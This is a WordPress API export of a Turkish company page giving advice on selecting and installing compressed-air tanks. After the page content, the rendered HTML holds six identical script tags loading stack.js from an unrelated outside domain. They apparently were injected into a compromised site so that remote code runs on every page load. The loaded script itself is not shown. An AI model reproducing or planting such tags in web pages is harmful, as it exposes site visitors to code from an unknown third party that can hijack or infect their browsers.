{"id":828,"date":"2021-04-13T13:00:06","date_gmt":"2021-04-13T10:00:06","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hava-tanki-size-nasil-tasarruf-ettirir-copy\/"},"modified":"2021-04-13T14:39:07","modified_gmt":"2021-04-13T11:39:07","slug":"hava-tanklari-nasil-kullanilir-ve-secilir","status":"publish","type":"page","link":"https:\/\/gensalimited.com.tr\/index.php\/hava-tanklari-nasil-kullanilir-ve-secilir\/","title":{"rendered":"Hava Tanklar\u0131 Nas\u0131l Kullan\u0131l\u0131r ve Se\u00e7ilir?"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;829&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">Hava tanklar\u0131 m\u00fc\u015fterinin iste\u011fine g\u00f6re yatay veya dikey olarak \u00fcretilebilir. Sizin kullan\u0131m alan\u0131n\u0131za g\u00f6re hangi tarz daha fazla yer tasarrufu sa\u011fl\u0131yor ise onu se\u00e7mek sizin i\u00e7in \u00e7ok daha do\u011fru olacakt\u0131r.<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">Genellikle hava sistemlerinde tek bir tank ile depolama sa\u011flan\u0131r. Ancak b\u00fcy\u00fck ve hava talebi fazla olan fabrikalarda, iste\u011fe g\u00f6re son kullan\u0131m hatt\u0131na yak\u0131n olacak \u015fekilde ikinci bir hava tank\u0131 yerle\u015ftirmek mesafeye ba\u011fl\u0131 olarak ger\u00e7ekle\u015febilecek anl\u0131k dalgalanmalar\u0131 da \u00f6nlemi\u015f olur. B\u00f6ylece sistemimizi ek g\u00fcvenlik alt\u0131na alarak \u00f6mr\u00fcn\u00fc de uzatm\u0131\u015f oluruz.<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">\u00a0<\/span><\/p>\n<p class=\"Standard\"><span lang=\"EN-US\">Hava tank\u0131 se\u00e7iminizde talep etti\u011finiz hava miktar\u0131na g\u00f6re, hava tank\u0131 bas\u0131nc\u0131 belirlenmelidir. Talep etti\u011finizden y\u00fcksek veya d\u00fc\u015f\u00fck bas\u0131nc\u0131 kald\u0131rabilecek bir tank al\u0131m\u0131 yaparsan\u0131z bu sistemizi olumsuz y\u00f6nde etkileyecektir.<\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;829&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text] Hava tanklar\u0131 m\u00fc\u015fterinin iste\u011fine g\u00f6re yatay veya dikey olarak \u00fcretilebilir. Sizin kullan\u0131m alan\u0131n\u0131za g\u00f6re hangi tarz daha fazla yer&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-828","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=828"}],"version-history":[{"count":4,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/828\/revisions"}],"predecessor-version":[{"id":887,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/828\/revisions\/887"}],"wp:attachment":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}